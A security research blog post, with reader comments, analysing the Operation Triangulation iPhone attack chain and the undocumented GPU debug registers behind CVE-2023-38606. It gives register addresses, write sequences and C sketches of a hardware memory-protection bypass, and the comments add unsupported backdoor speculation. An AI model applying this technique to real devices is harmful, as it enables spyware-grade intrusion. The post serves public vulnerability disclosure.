
Operation Triangulation: The last (hardware) mystery

Today, on December 27, 2023, we (Boris Larin, Leonid Bezvershenko, and Georgy Kucherin) delivered a presentation titled “Operation Triangulation: What You Get When Attack iPhones of Researchers” at the 37th Chaos Communication Congress (37C3), held at the Congress Center Hamburg. The presentation summarized the results of our long-term research into Operation Triangulation, conducted with our colleagues Igor Kuznetsov, Valentin Pashkov, and Mikhail Vinogradov.

This presentation was also the first time we had publicly disclosed the details of all the exploits and vulnerabilities used in the attack. We discover and analyze new exploits and the attacks that use them on a daily basis, and we have found and reported more than thirty in-the-wild zero-days in Adobe, Apple, Google, and Microsoft products, but this is definitely the most sophisticated attack chain we have ever seen.

Operation Triangulation attack chain

Here is a quick rundown of this 0-click iMessage attack, which used four zero-days and was designed to work on iOS versions up to iOS 16.2.

  • Attackers send a malicious iMessage attachment, which the application processes without showing any signs to the user.
  • This attachment exploits the remote code execution vulnerability CVE-2023-41990 in the undocumented, Apple-only ADJUST TrueType font instruction. This instruction had existed since the early nineties before a patch removed it.
  • It uses return/jump oriented programming and multiple stages written in the NSExpression/NSPredicate query language, patching the JavaScriptCore library environment to execute a privilege escalation exploit written in JavaScript.
  • This JavaScript exploit is obfuscated to make it completely unreadable and to minimize its size. Still, it has around 11,000 lines of code, which are mainly dedicated to JavaScriptCore and kernel memory parsing and manipulation.
  • It exploits the JavaScriptCore debugging feature DollarVM ($vm) to gain the ability to manipulate JavaScriptCore’s memory from the script and execute native API functions.
  • It was designed to support both old and new iPhones and included a Pointer Authentication Code (PAC) bypass for exploitation of recent models.
  • It uses the integer overflow vulnerability CVE-2023-32434 in XNU’s memory mapping syscalls (mach_make_memory_entry and vm_map) to obtain read/write access to the entire physical memory of the device at user level.
  • It uses hardware memory-mapped I/O (MMIO) registers to bypass the Page Protection Layer (PPL). This was mitigated as CVE-2023-38606.
  • After exploiting all the vulnerabilities, the JavaScript exploit can do whatever it wants to the device including running spyware, but the attackers chose to: (a) launch the IMAgent process and inject a payload that clears the exploitation artefacts from the device; (b) run a Safari process in invisible mode and forward it to a web page with the next stage.
  • The web page has a script that verifies the victim and, if the checks pass, receives the next stage: the Safari exploit.
  • The Safari exploit uses CVE-2023-32435 to execute a shellcode.
  • The shellcode executes another kernel exploit in the form of a Mach object file. It uses the same vulnerabilities, CVE-2023-32434 and CVE-2023-38606, and is also massive in terms of size and functionality, but completely different from the kernel exploit written in JavaScript: the only code the two share relates to exploiting those vulnerabilities. Still, most of its code is also dedicated to parsing and manipulating the kernel memory. It contains various post-exploitation utilities, which are mostly unused.
  • The exploit obtains root privileges and proceeds to execute other stages, which load spyware. We covered these stages in our previous posts.

We are almost done reverse-engineering every aspect of this attack chain, and we will be releasing a series of articles next year detailing each vulnerability and how it was exploited.

However, there are certain aspects to one particular vulnerability that we have not been able to fully understand.

The mystery and the CVE-2023-38606 vulnerability

What we want to discuss is related to the vulnerability that has been mitigated as CVE-2023-38606. Recent iPhone models have additional hardware-based security protection for sensitive regions of the kernel memory. This protection prevents attackers from obtaining full control over the device if they can read and write kernel memory, as achieved in this attack by exploiting CVE-2023-32434. We discovered that to bypass this hardware-based security protection, the attackers used another hardware feature of Apple-designed SoCs.

If we try to describe this feature and how the attackers took advantage of it, it all comes down to this: they are able to write data to a certain physical address while bypassing the hardware-based memory protection by writing the data, destination address, and data hash to unknown hardware registers of the chip that are not used by the firmware.

Our guess is that this unknown hardware feature was most likely intended to be used for debugging or testing purposes by Apple engineers or the factory, or that it was included by mistake. Because this feature is not used by the firmware, we have no idea how attackers would know how to use it.

We are publishing these technical details so that other iOS security researchers can confirm our findings and come up with possible explanations of how the attackers learned about this hardware feature.

Technical details

Various peripheral devices available in the SoC may provide special hardware registers that can be used by the CPU to operate these devices. For this to work, these hardware registers are mapped to the memory accessible by the CPU and are known as “memory-mapped I/O (MMIO)”.

Address ranges for MMIOs of peripheral devices in Apple products (iPhones, Macs, and others) are stored in a special file format: DeviceTree. Device tree files can be extracted from the firmware, and their contents can be viewed with the help of the dt utility.

Example of how MMIO ranges are stored in the device tree

For example, in this screenshot, you can see the start (0x210f00000) and the size (0x50000) of the acc-impl MMIO range for cpu0.
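To make this concrete, here is a minimal C sketch of how such a (base, size) pair translates into an address range and how one can check whether a given physical address falls inside it. The mmio_range struct and mmio_range_contains helper are hypothetical names used only for illustration and are not part of any Apple tooling.

    #include <stdint.h>
    #include <stdio.h>

    struct mmio_range {
        uint64_t base;   /* physical start address */
        uint64_t size;   /* length in bytes        */
    };

    static int mmio_range_contains(const struct mmio_range *r, uint64_t pa)
    {
        return pa >= r->base && pa < r->base + r->size;
    }

    int main(void)
    {
        /* The acc-impl entry above: start 0x210f00000, size 0x50000,
         * i.e. the range [0x210f00000, 0x210f50000). */
        struct mmio_range acc_impl = { 0x210f00000ULL, 0x50000ULL };

        printf("acc-impl: 0x%llx-0x%llx\n",
               (unsigned long long)acc_impl.base,
               (unsigned long long)(acc_impl.base + acc_impl.size));

        /* The addresses used by the exploit fall outside every range like
         * this one that is defined in the device tree. */
        printf("contains 0x206040000? %d\n",
               mmio_range_contains(&acc_impl, 0x206040000ULL));
        return 0;
    }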

While analyzing the exploit used in the Operation Triangulation attack, I discovered that most of the MMIOs used by the attackers to bypass the hardware-based kernel memory protection do not belong to any MMIO ranges defined in the device tree. The exploit targets Apple A12–A16 Bionic SoCs, using unknown MMIO blocks of registers located at the following addresses: 0x206040000, 0x206140000, and 0x206150000.

This prompted me to try something. I checked different device tree files for different devices and different firmware files: no luck. I checked publicly available source code: no luck. I checked the kernel images, kernel extensions, iBoot, and coprocessor firmware in search of a direct reference to these addresses: nothing.

How could it be that the exploit used MMIOs that were not used by the firmware? How did the attackers find out about them? What peripheral device(s) do these MMIO addresses belong to?

It occurred to me that I should check what other known MMIOs were located in the area close to these unknown MMIO blocks. That approach was successful.

Let us take a look at a dump of the device tree entry for gfx-asc, which is the GPU coprocessor.

Dump of the device tree entry for gfx-asc

It has two MMIO ranges: 0x206400000–0x20646C000 and 0x206050000–0x206050008. Let us take a look at how they correlate with the regions used by the exploit.

Correlation of the gfx-asc MMIO ranges and the addresses used by the exploit

To be more precise, the exploit uses the following unknown addresses: 0x206040000, 0x206140008, 0x206140108, 0x206150020, 0x206150040, and 0x206150048. We can see that most of these are located in the area between the two gfx-asc regions, and the remaining one is located close to the beginning of the first gfx-asc region. This suggested that all these MMIO registers most likely belonged to the GPU coprocessor!

After that, I took a closer look at the exploit and found one more thing that confirmed my theory. The first thing the exploit does during initialization is write to another MMIO register, which is located at a different address for each SoC.

Pseudocode for the GFX power manager control code from the exploit

With the help of the device tree and Siguza’s utility, pmgr, I was able to discover that all these addresses corresponded to the GFX register in the power manager MMIO range.

Finally, I obtained a third confirmation when I decided to try to access the registers located in these unknown regions. Almost instantly, the GPU coprocessor panicked with the message “GFX SERROR Exception class=0x2f (SError interrupt), IL=1, iss=0 – power(1)”.

This way, I was able to confirm that all these unknown MMIO registers used for the exploitation belonged to the GPU coprocessor. This motivated me to take a deeper look at its firmware, which is also written in ARM and unencrypted, but I could not find anything related to these registers in there.

I decided to take a closer look at how the exploit operated these unknown MMIO registers. The register 0x206040000 stands out from all the others because it is located in a separate MMIO block from all the other registers. It is touched only during the initialization and finalization stages of the exploit: it is the first register to be set during initialization and the last one, during finalization. From my experience, it was clear that the register either enabled/disabled the hardware feature used by the exploit or controlled interrupts. I started to follow the interrupt route, and fairly soon, I was able to recognize this unknown register, 0x206040000, and also discovered what exactly was mapped to the address range of 0x206000000–0x206050000. Below, you can see the reverse-engineered code of the exploit that I was able to recognize. I have given it a proper name.

Pseudocode for the usage of the 0x206040000 register by the exploit

I was able to match the ml_dbgwrap_halt_cpu function from the pseudocode above to a function with the same name in the dbgwrap.c file of the XNU source code. This file contains code for working with the ARM CoreSight MMIO debug registers of the main CPU. The source code states that there are four CoreSight-related MMIO regions, named ED, CTI, PMU, and UTT. Each occupies 0x10000 bytes, and they are all located next to one another. The ml_dbgwrap_halt_cpu function uses the UTT region, and the source code states that, unlike the other three, it does not come from ARM, but is a proprietary Apple feature that was added just for convenience.

I was able to confirm that 0x206000000–0x206050000 was indeed a block of CoreSight MMIO debug registers for the GPU coprocessor by writing ARM_DBG_LOCK_ACCESS_KEY to the corresponding location. Each core of the main CPU has its own block of CoreSight MMIO debug registers, but unlike the GPU coprocessor, their addresses can be found in the device tree.
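The C sketch below illustrates that layout. The ordering of the regions and the EDLAR offset (0xFB0, taken from the ARM debug architecture) are assumptions made purely for illustration; 0xC5ACCE55 is the standard CoreSight lock access key that XNU calls ARM_DBG_LOCK_ACCESS_KEY, and the internals of the Apple-proprietary UTT region remain undocumented.

    #include <stdint.h>

    #define CORESIGHT_REGION_SIZE 0x10000ULL
    enum coresight_region { CS_ED = 0, CS_CTI = 1, CS_PMU = 2, CS_UTT = 3 };

    /* Standard CoreSight lock access key (ARM_DBG_LOCK_ACCESS_KEY in XNU). */
    #define ARM_DBG_LOCK_ACCESS_KEY 0xC5ACCE55u
    /* Lock Access Register offset inside the external debug region (assumed). */
    #define EDLAR_OFFSET 0xFB0u

    /* The four regions are simply laid out back to back, 0x10000 bytes each. */
    uint64_t coresight_region_base(uint64_t block_base, enum coresight_region r)
    {
        return block_base + (uint64_t)r * CORESIGHT_REGION_SIZE;
    }

    /* Hypothetical unlock of the debug registers: write the access key to
     * EDLAR. For the GPU coprocessor, block_base would be 0x206000000. */
    void coresight_unlock(volatile uint8_t *block_base)
    {
        volatile uint32_t *edlar =
            (volatile uint32_t *)(block_base + EDLAR_OFFSET);
        *edlar = ARM_DBG_LOCK_ACCESS_KEY;
    }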

It is also interesting that the author(s) of this exploit knew how to use the proprietary Apple UTT region to unhalt the CPU: this code is not part of the XNU source code. Perhaps it is fair to say that this could easily be found out through experimentation.

Something that cannot be found that way is what the attackers did with the registers in the second unknown region. I am not sure what blocks of MMIO debug registers are located there, or how the attackers found out how to use them if they were not used by the firmware.

Let us look at the remaining unknown registers used by the exploit.

The registers 0x206140008 and 0x206140108 control enabling/disabling and running the hardware feature used by the exploit.

Pseudocode for the usage of the 0x206140008 and 0x206140108 registers by the exploit

The register 0x206150020 is used only for Apple A15/A16 Bionic SoCs. It is set to 1 during the initialization stage of the exploit and restored to its original value during the finalization stage.

The register 0x206150040 is used to store some flags and the lower half of the destination physical address.

The last register, 0x206150048, is used for storing the data that needs to be written and the upper half of the destination physical address, bundled together with the data hash and another value (possibly a command). This hardware feature writes the data in aligned blocks of 0x40 bytes, and everything should be written to the 0x206150048 register in nine sequential writes.

Pseudocode for the usage of the 0x206150040 and 0x206150048 registers by the exploit

As long as everything is done correctly, the hardware should perform a direct memory access (DMA) operation and write the data to the requested location.
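Putting these pieces together, here is a minimal C sketch of the sequence described above. The register names, the flag bits, the packing of the final word, the values written to the enable/run registers, and the mmio_write64/calc_hash stubs are assumptions made for illustration only; the register addresses, the 0x40-byte block size, and the nine sequential writes to 0x206150048 come from the analysis of the exploit.

    #include <stdint.h>
    #include <stdio.h>
    #include <string.h>

    #define REG_DBG_ENABLE    0x206140008ULL /* enables/disables the feature  */
    #define REG_DBG_RUN       0x206140108ULL /* runs the operation            */
    #define REG_A15_A16_EXTRA 0x206150020ULL /* only touched on A15/A16       */
    #define REG_DEST_LOW      0x206150040ULL /* flags + lower half of dest PA */
    #define REG_DATA_FIFO     0x206150048ULL /* data, upper half of PA, hash  */

    /* Stub standing in for the exploit's 64-bit write primitive (built on the
     * physical read/write access from CVE-2023-32434); here it only logs. */
    static void mmio_write64(uint64_t reg_pa, uint64_t value)
    {
        printf("write64 0x%09llx <- 0x%016llx\n",
               (unsigned long long)reg_pa, (unsigned long long)value);
    }

    /* Stub for the custom 20-bit hash discussed later in the post. */
    static uint64_t calc_hash(const uint8_t block[0x40], uint64_t dest_pa)
    {
        (void)block; (void)dest_pa;
        return 0;
    }

    /* Write one aligned 0x40-byte block to dest_pa, bypassing PPL. */
    static void dma_write_block(uint64_t dest_pa, const uint8_t data[0x40])
    {
        uint64_t words[8];
        memcpy(words, data, sizeof(words));

        mmio_write64(REG_DBG_ENABLE, 1);                      /* enable        */
        mmio_write64(REG_DEST_LOW, dest_pa & 0xFFFFFFFFULL);  /* flags + low PA */

        /* Nine sequential writes to the same register: presumably eight
         * 8-byte data words... */
        for (int i = 0; i < 8; i++)
            mmio_write64(REG_DATA_FIFO, words[i]);

        /* ...plus one word bundling the upper half of the destination
         * address, the hash, and what appears to be a command (the real
         * field layout is not reproduced here). */
        mmio_write64(REG_DATA_FIFO,
                     (dest_pa >> 32) | (calc_hash(data, dest_pa) << 32));

        mmio_write64(REG_DBG_RUN, 1);                         /* kick it off   */
        mmio_write64(REG_DBG_ENABLE, 0);                      /* disable       */
    }

    int main(void)
    {
        uint8_t block[0x40] = { 0 };
        dma_write_block(0x800000000ULL, block); /* arbitrary example address */
        return 0;
    }

In the exploit itself, the 0x206040000 register discussed earlier and, on A15/A16, the 0x206150020 register are additionally touched during the initialization and finalization stages.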

The exploit uses this hardware feature as a Page Protection Layer (PPL) bypass, mainly for patching page table entries. It can also be used for patching the data in the protected __PPLDATA segment. The exploit does not use the feature to patch the kernel code, but once during a test, I was able to overwrite an instruction in the __TEXT_EXEC segment of the kernel and get an “Undefined Kernel Instruction” panic with the expected address and value. This only worked once—the other times I tried I got an AMCC panic. I have an idea about what I did right that one time it worked, and I am planning to look deeper into this in the future, because I think it would be really cool to take a vulnerability that was used to harm us and use it for something good, like enabling kernel debugging on new iPhones.

Now that the work with all the MMIO registers has been covered, let us take a look at one last thing: how the hashes are calculated. The algorithm is shown below.

Pseudocode for the hash function used by this unknown hardware feature

As you can see, it is a custom algorithm, and the hash is calculated by using a predefined sbox table. I tried to search for it in a large collection of binaries, but found nothing.

You may notice that this hash does not look very secure, as it occupies just 20 bits (10+10, as it is calculated twice), but it does its job as long as no one knows how to calculate and use it. It is best summarized with the term “security by obscurity”.
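Purely to illustrate the structure (and not the actual algorithm, which is shown in the exploit pseudocode above), the C sketch below computes a 10-bit code from half of a 0x40-byte block using a hypothetical lookup table and combines two such codes into 20 bits. The real table contents, chunking, and combination logic are unknown.

    #include <stddef.h>
    #include <stdint.h>

    /* Hypothetical 10-bit lookup table standing in for the real "sbox". */
    static const uint16_t sbox[64] = { 0 /* real values unknown */ };

    /* XOR in one table entry per set data bit, a common construction for
     * lookup-table-driven codes; used here only to illustrate the idea. */
    uint16_t code10(const uint8_t *data, size_t len)
    {
        uint16_t code = 0;
        for (size_t i = 0; i < len; i++)
            for (int b = 0; b < 8; b++)
                if (data[i] & (1u << b))
                    code ^= sbox[(i * 8 + b) % 64];
        return code & 0x3FF; /* keep 10 bits */
    }

    /* 10 bits computed twice (here, once per half of the block) = 20 bits. */
    uint32_t hash20(const uint8_t block[0x40])
    {
        return ((uint32_t)code10(block, 0x20) << 10) | code10(block + 0x20, 0x20);
    }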

How could attackers discover and exploit this hardware feature if it is not used and there are no instructions anywhere in the firmware on how to use it?

I ran one more test. I checked and found that the M1 chip inside the Mac also has this unknown hardware feature. Then I used the amazing m1n1 tool to conduct an experiment. This tool has a trace_range function, which traces all access to a provided range of MMIO registers. I used it to set up tracing for the memory range 0x206110000–0x206400000, but it reported no usage of these registers by macOS.

Through an amazing coincidence, both my 37C3 presentation and this post discuss a vulnerability very similar to the one I talked about during my presentation at the 36th Chaos Communication Congress (36C3) in 2019.

In the presentation titled, “Hacking Sony PlayStation Blu-ray Drives”, I talked about how I was able to dump firmware and achieve code execution on the Blu-ray drives of Sony PlayStation 3 and 4 by using MMIO DMA registers that were accessible through SCSI commands.

I was able to discover and exploit this vulnerability because earlier versions of the firmware used these registers for all DRAM operations, but then Sony stopped using them and started accessing DRAM directly, because all DRAM was also mapped to the CPU address space. Because no one was using these registers anymore and I knew how to use them, I took advantage of them. I did not need to know any secret hash algorithm.

Could something similar have happened in this case? I do not know, but this GPU coprocessor first appeared in recent Apple SoCs. In my personal opinion, based on all the information provided above, I highly doubt that this hardware feature was previously used for anything in retail firmware. Nevertheless, there is a possibility that it was previously revealed by mistake in some particular firmware or XNU source code release and then removed.

I was hoping to find out what was located inside the second unknown region from the fix for this vulnerability implemented in iOS 16.6. I was able to find out how Apple mitigated this issue, but they obfuscated the fix.

Apple mitigated this vulnerability by adding the MMIO ranges 0x206000000–0x206050000 and 0x206110000–0x206400000 used by the exploit to the pmap-io-ranges stored in the device tree. XNU uses the information stored there to determine whether to allow mapping of certain physical addresses. All entries stored there have a meaningful tag name that explains what kind of memory the range belongs to.

Example of entries stored in the pmap-io-ranges

Here, PCIe stands for “Peripheral Component Interconnect Express”, DART stands for “Device Address Resolution Table”, DAPF means “Device Address Filter”, and so on.
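For reference, the structure below is roughly how XNU represents one such entry (see pmap_io_range in the open-source XNU tree); treat the exact fields and flags as a sketch, since they vary between releases. The four-character signature field is where the tag names discussed here live.

    #include <stdint.h>

    /* Approximation of XNU's pmap_io_range; field details vary by release. */
    typedef struct pmap_io_range {
        uint64_t addr;      /* physical start of the range               */
        uint64_t len;       /* length in bytes                           */
        uint32_t wimg;      /* caching/access attributes and flags       */
        uint32_t signature; /* four-character tag, e.g. 'PCIe' or 'DART' */
    } __attribute__((packed)) pmap_io_range_t;

    /* The iOS 16.6 mitigation effectively adds entries covering
     * 0x206000000-0x206050000 and 0x206110000-0x206400000 to this list,
     * so the kernel refuses to map those physical addresses. */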

And here are the tag names for regions used by the exploit. They stand out from the rest.

Entries for regions used by the exploit

Conclusion

This is no ordinary vulnerability, and we have many unanswered questions. We do not know how the attackers learned to use this unknown hardware feature or what its original purpose was. Nor do we know whether it was developed by Apple or is a third-party component like ARM CoreSight.

What we do know—and what this vulnerability demonstrates—is that advanced hardware-based protections are useless in the face of a sophisticated attacker as long as there are hardware features that can bypass those protections.

Hardware security very often relies on “security through obscurity”, and it is much more difficult to reverse-engineer than software, but this is a flawed approach, because sooner or later, all secrets are revealed. Systems that rely on “security through obscurity” can never be truly secure.

Update 2024-01-09

Famous hardware hacker Hector Martin (marcan) was able to figure out that what we thought was a custom hash was actually something a little different. It is an error correction code (ECC), or more precisely, a Hamming code with a custom lookup table (what we call “sbox table” in the text above).

This discovery helps us understand the original purpose of this unknown hardware feature. We originally thought it was a debugging feature that provided direct memory access to the memory and was protected with a “dummy” hash for extra security. But the fact that it involves an ECC, coupled with the unstable behavior observed when trying to use it to patch the kernel code, leads to the conclusion that this hardware feature provides direct memory access to the cache.

This discovery also raises the possibility that this unused hardware feature could have been found through experimentation, but to do so would require attackers to solve a large number of unknown variables. Attackers could find values in a custom lookup table using brute force, but they would also need to know that such a powerful cache debugging feature exists, that it involves Hamming code and, most importantly, they would need to know the location and purpose of all the MMIO registers involved, and how and in what order to interact with them. Were the attackers able to resolve all these unknown variables by themselves or was this information revealed somewhere by mistake? It still remains a mystery.

Comments

  1. Agronymous Coward

    As you say, so weird that they had all those components to access an undocumented feature like that successfully. Surely Apple need to issue more of an explanation?

    Interesting that the earliest affected GPU is A12 as that was the first ‘real’ Apple designed GPU – according to Anandtech (https://www.anandtech.com/show/13392/the-iphone-xs-xs-max-review-unveiling-the-silicon-secrets/2)

    Could that imply that the naughty MMIO pathway had to be Apple created rather than a throwback to ARM (like Coresight) or PowerVR IP?

    Also I see you used m1n1 but have you had any discussion with the Asahi Linux crew? They have patches for the G11P along with the other Apple GPUs and may recognise something?

  2. Wes

    Does this exploit affect phones running in Lockdown mode?

    1. Marku Wolf

      yes

    2. HCS

      This is a hardware-level vulnerability, so the answer to that question is yes. The only way you would not get this used against you, if you were the target, would be to never have the phone online, so you’d have to have all radios and all remote connectivity turned off.

  3. Eddy

    Even though I don’t understand a lot of it, I wanted to say amazing work Boris for deconstructing the whole thing, wow.

    1. Wiz

      Thanks bro, for informing us.

  4. Reuben Johnston

    The academic community needs more case study examples like this one. Thank you to the authors for sharing this research!

  5. Hasan Kilid

    If something like this had happened to Huawei/Xiaomi, they would call it a Chinese HW backdoor.
    But there are no backdoors in US products :))

  6. Josh

    I wouldn’t say an API that requires a custom hash with a custom SBOX is security by obscurity. It’s a bigger key than most ciphers.

  7. Dennis

    If this “hidden feature” was known to Apple, it’s extremely suspicious and points to a likely Apple/NSA PRISM-like backdoor collaboration.

  8. Amun

    Is there a way to detect and/or block such attacks?

  9. SvengaliExploit

    In my mind this feels like an intentionally designed backdoor for bypassing hardware security.

  10. Francisco

    A possible backdoor, industrial espionage? Mass espionage?

  11. AGRONYMOUS COW HERD

    The implications of the comment by AGRONYMOUS COWARD posted on December 28, 2023 are significant. If correct, they indicate a deliberately introduced hardware backdoor communicated to an external third party by the manufacturer. This has happened before.
    https://en.wikipedia.org/wiki/Clipper_chip
    https://www.forbes.com/sites/daveywinder/2020/02/12/cia-secretly-bought-global-encryption-provider-built-backdoors-spied-on-100-foreign-governments/

  12. Glorby

    How does this compare to Pegasus?

  13. Thagorus.py

    Incredible sleuthing. Thanks

  14. Lateral

    Perhaps I missed it, but I didn’t see what type of attachment was used.
    Was it a PDF, or could it have been something else?

    1. Securelist

      Hi Lateral!

      The file containing the malicious exploit was a PDF.

  15. Walnut

    Would the implementation of ARM hardware MTE prevent the effectiveness of the type of kernel exploits used in Triangulation?

  16. Paul C

    I imagine that the undocumented MMIOs are used for component testing in the factory and perhaps by Apple’s proprietary Genius Bar diagnostic test suite. Also, public header files for various frameworks often include struct definitions of “unused” registers.

  17. Gabe

    Could it have anything to do with Cryptex OS and deploying security updates? Leveraging this hardware as a standalone path to provide rapid security response so it does not rely on the currently affected hardware of the user’s iPhone.

    I’m not an engineer but I’ve read all my logs and it’s usually the Cryptex OS that’s creating events on XNU, NSE, ANE.

    I’ve also noticed that some logs say ARM and others say ARMe. I haven’t checked against your regions yet but I will and I thank you for doing this and for being a good guy hacker!
